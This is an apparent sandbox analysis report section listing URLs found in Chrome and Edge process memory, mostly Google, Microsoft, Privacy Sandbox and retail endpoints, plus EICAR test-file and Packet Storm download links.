Source: chrome.exe, 0000002C.00000002.172380019331.00000C6401260000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.windows.net/consumers/oauth2/v2.0/authorize?client_id=77f68844-337b-4044-a0d4-153795cf
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 0000002C.00000002.172381522710.00000C6401420000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380279212.00000C640129C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/
Source: chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172381522710.00000C6401420000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172381124600.00000C64013C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 0000002C.00000002.172373073964.00000C6400881000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172384289955.00000C6401838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172381394840.00000C6401404000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 0000002C.00000002.172384289955.00000C6401838000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_defaultdefault
Source: msedge.exe, 0000001B.00000002.169652041277.000053D00009C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172804037462.00007B1C00088000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.cn/
Source: msedge.exe, 0000001B.00000002.169652041277.000053D00009C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172823548118.00007B1C018BC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172821240054.00007B1C01550000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172804037462.00007B1C00088000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172822146382.00007B1C0161C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172807321578.00007B1C006B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172803790791.00007B1C00044000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172817780934.00007B1C011C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.com/
Source: chrome.exe, 0000002C.00000002.172375405258.00000C6400B3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172383672535.00000C640167C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172475474020.00007B1C00710000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 0000002C.00000002.172377475928.00000C6400E20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374513342.00000C6400A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 0000002C.00000002.172377475928.00000C6400E20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374513342.00000C6400A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000017.00000003.169436072801.00000D70005CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169435858432.00000D70005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169435933070.00000D70005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172299941373.00000C6401EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172300088772.00000C6401EC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172259076753.00000C60005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172259282498.00000C60005CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172258979056.00000C60005AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email
Source: chrome.exe, 00000017.00000003.169480138143.00000D740198C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169485746828.00000D70006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172298155794.00000C6401A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172297691714.00000C6401A2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172301774383.00000C60006CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email2B
Source: chrome.exe, 00000017.00000003.169436072801.00000D70005CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169435858432.00000D70005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169435933070.00000D70005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172259076753.00000C60005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172259282498.00000C60005CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172258979056.00000C60005AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-emailp_
Source: chrome.exe, 0000002C.00000002.172372538643.00000C64007A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374513342.00000C6400A3C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000003.172475474020.00007B1C00710000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002F.00000002.172807851726.00007B1C00750000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000017.00000003.169455820763.00000D74015D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172376725260.00000C6400CFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172276633710.00000C6401504000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myshop.amplify.com/cart
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 0000002C.00000002.172370661494.00000C6400340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380173917.00000C6401280000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380225929.00000C640128C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://office.com/setup
Source: chrome.exe, 0000002C.00000003.172297299914.00000C6400374000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 0000002C.00000002.172379912515.00000C6401248000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379860173.00000C640123C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 0000002C.00000002.172379912515.00000C6401248000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379860173.00000C640123C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378699881.00000C6401004000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 0000002C.00000002.172379860173.00000C640123C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379963311.00000C6401254000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380019331.00000C6401260000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1689043206&target=OPTIMIZATION_TARGET_VIS
Source: chrome.exe, 0000002C.00000002.172379860173.00000C640123C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379963311.00000C6401254000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1691042511&target=OPTIMIZATION_TARGET_NEW
Source: chrome.exe, 0000002C.00000002.172379912515.00000C6401248000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379860173.00000C640123C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379963311.00000C6401254000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1696267841&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 0000002C.00000002.172379860173.00000C640123C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379963311.00000C6401254000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380019331.00000C6401260000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1715213284&target=OPTIMIZATION_TARGET_TEX
Source: chrome.exe, 0000002C.00000002.172379912515.00000C6401248000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379860173.00000C640123C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379963311.00000C6401254000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1722870342&target=OPTIMIZATION_TARGET_CLI
Source: chrome.exe, 0000002C.00000002.172379912515.00000C6401248000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379860173.00000C640123C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378595932.00000C6400FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1722870385&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 0000002C.00000002.172379912515.00000C6401248000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379860173.00000C640123C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378699881.00000C6401004000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378595932.00000C6400FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1722870420&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 0000002C.00000002.172380173917.00000C6401280000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380123030.00000C6401274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1724079789&target=OPTIMIZATION_TARGET_CLI
Source: chrome.exe, 0000002C.00000002.172380173917.00000C6401280000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380123030.00000C6401274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1724079821&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 0000002C.00000002.172380123030.00000C6401274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1724079854&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 0000002C.00000002.172379860173.00000C640123C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379963311.00000C6401254000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380019331.00000C6401260000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=2311071436&target=OPTIMIZATION_TARGET_WEB
Source: chrome.exe, 0000002C.00000002.172379860173.00000C640123C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378699881.00000C6401004000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380019331.00000C6401260000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=240731042095&target=OPTIMIZATION_TARGET_S
Source: chrome.exe, 0000002C.00000002.172379912515.00000C6401248000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379860173.00000C640123C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=5&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 0000002C.00000002.172379748982.00000C6401220000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172382836385.00000C6401584000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/
Source: chrome.exe, 0000002C.00000002.172382836385.00000C6401584000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.html
Source: chrome.exe, 0000002C.00000002.172379748982.00000C6401220000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.html0
Source: chrome.exe, 0000002C.00000002.172379748982.00000C6401220000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.html0BJ
Source: chrome.exe, 0000002C.00000002.172379748982.00000C6401220000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172382836385.00000C6401584000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/files/download/22459/BIOS320.EXE
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
Source: chrome.exe, 0000002C.00000002.172374409051.00000C6400A04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://passwords.google/
Source: chrome.exe, 00000017.00000003.169455820763.00000D74015D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172376725260.00000C6400CFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172276633710.00000C6401504000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poshmark.com/bundles/shop
Source: chrome.exe, 00000017.00000003.169485746828.00000D70006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172301774383.00000C60006CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
Source: chrome.exe, 00000017.00000003.169485746828.00000D70006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172301774383.00000C60006CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
Source: chrome.exe, 00000017.00000003.169485746828.00000D70006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172301774383.00000C60006CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000017.00000003.169485746828.00000D70006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172301774383.00000C60006CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
Source: chrome.exe, 0000002C.00000003.172301774383.00000C60006CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 0000002C.00000002.172380225929.00000C640128C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://recoveringlib.blogspot.com/
Source: chrome.exe, 0000002C.00000003.172272516786.00000C640044C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172371208049.00000C640044C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 0000002C.00000002.172368849375.00000C64000B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 0000002C.00000002.172379241276.00000C6401188000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172378699881.00000C6401004000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
Source: chrome.exe, 0000002C.00000002.172370661494.00000C6400340000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379748982.00000C6401220000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172382836385.00000C6401584000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380225929.00000C640128C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.eicar.org/eicar.com.txt
Source: chrome.exe, 0000002C.00000002.172372314713.00000C6400728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172279996265.00000C6400720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272029471.00000C6400724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172280226855.00000C6400724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172277467418.00000C6400724000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.eicar.org:443
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://secure.newegg.com/shop/cart
Source: chrome.exe, 0000002C.00000002.172370396581.00000C6400264000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172377475928.00000C6400E20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000017.00000003.169483014536.00000D7400A80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172372999161.00000C6400854000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://servedby.flashtalking.com/container/13539;99030;10307;iframe/?ftXRef=&ftXValue=&ftXType=&ftX
Source: chrome.exe, 00000017.00000003.169478799801.00000D7401908000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169479158150.00000D7401964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379122693.00000C6401168000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172377662836.00000C6400E64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172388612666.00000C640204C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com
Source: chrome.exe, 00000017.00000003.169451513999.00000D7400A80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172277636962.00000C6400488000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172275070066.00000C6400254000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172271372813.00000C640048C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172280107241.00000C6400488000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172277580399.00000C6400484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172272281153.00000C6400A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380225929.00000C640128C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172370269683.00000C6400254000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172368575281.00000C6400030000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172377931287.00000C6400EB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172370586589.00000C6400320000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172273433460.00000C6400488000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172372493421.00000C640079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172371362332.00000C6400488000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/
Source: chrome.exe, 0000002C.00000002.172378503814.00000C6400FB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379482246.00000C64011E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380173917.00000C6401280000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380225929.00000C640128C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/?ms.officeurl=setup
Source: chrome.exe, 0000002C.00000002.172377931287.00000C6400EB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172388612666.00000C640204C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/EnterPin?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
Source: chrome.exe, 0000002C.00000002.172369441720.00000C6400130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/EnterPin?tid
Source: chrome.exe, 00000017.00000003.169479158150.00000D7401964000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172379122693.00000C6401168000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380173917.00000C6401280000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172368649110.00000C640005C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172372999161.00000C6400854000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172377662836.00000C6400E64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374513342.00000C6400A3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172388612666.00000C640204C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/Home/EligibileActModern?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
Source: chrome.exe, 0000002C.00000002.172380173917.00000C6401280000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/Home/Provision?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
Source: chrome.exe, 0000002C.00000002.172380019331.00000C6401260000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/SignIn?ctid=34c190b7-c610-402a-b0d1-920cecdfcf12&redirectUri=https%3A%2F%2F
Source: chrome.exe, 0000002C.00000002.172380019331.00000C6401260000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374513342.00000C6400A3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172273433460.00000C6400488000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172371362332.00000C6400488000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/SignIn?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8&redirectUri=https%3A%2F%2F
Source: chrome.exe, 0000002C.00000003.172272281153.00000C6400A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172372493421.00000C640079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172371362332.00000C6400488000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/SignIn?ru=https%3A%2F%2Fsetup.office.com%2F%3Fms.officeurl%3Dsetup
Source: chrome.exe, 0000002C.00000002.172380173917.00000C6401280000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172377662836.00000C6400E64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172374513342.00000C6400A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/home/ProvisionLoading?ctid=7cf86fed-a1e2-4492-bd27-ed1c1d636ca8
Source: chrome.exe, 0000002C.00000002.172380514944.00000C64012EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000002.172380225929.00000C640128C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://setup.office.com/signin-oidc
Source: chrome.exe, 00000017.00000003.169436072801.00000D70005CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169435858432.00000D70005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169435933070.00000D70005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172299941373.00000C6401EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172300088772.00000C6401EC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172259076753.00000C60005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172259282498.00000C60005CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172258979056.00000C60005AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.com
Source: chrome.exe, 00000017.00000003.169480138143.00000D740198C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169485746828.00000D70006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172298155794.00000C6401A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172297691714.00000C6401A2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172301774383.00000C60006CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.com2
Source: chrome.exe, 00000017.00000003.169480138143.00000D740198C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172298155794.00000C6401A38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172297691714.00000C6401A2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comJv
Source: chrome.exe, 00000017.00000003.169436072801.00000D70005CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169435858432.00000D70005AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000017.00000003.169435933070.00000D70005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172259076753.00000C60005B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172259282498.00000C60005CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002C.00000003.172258979056.00000C60005AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comp_
Source: chrome.exe, 0000002C.00000002.172374066758.00000C64009A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shop.advanceautoparts.com/web/OrderItemDisplay
Source: chrome.exe, 0000002C.00000002.172374136020.00000C64009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shop.lululemon.com/shop/mybag
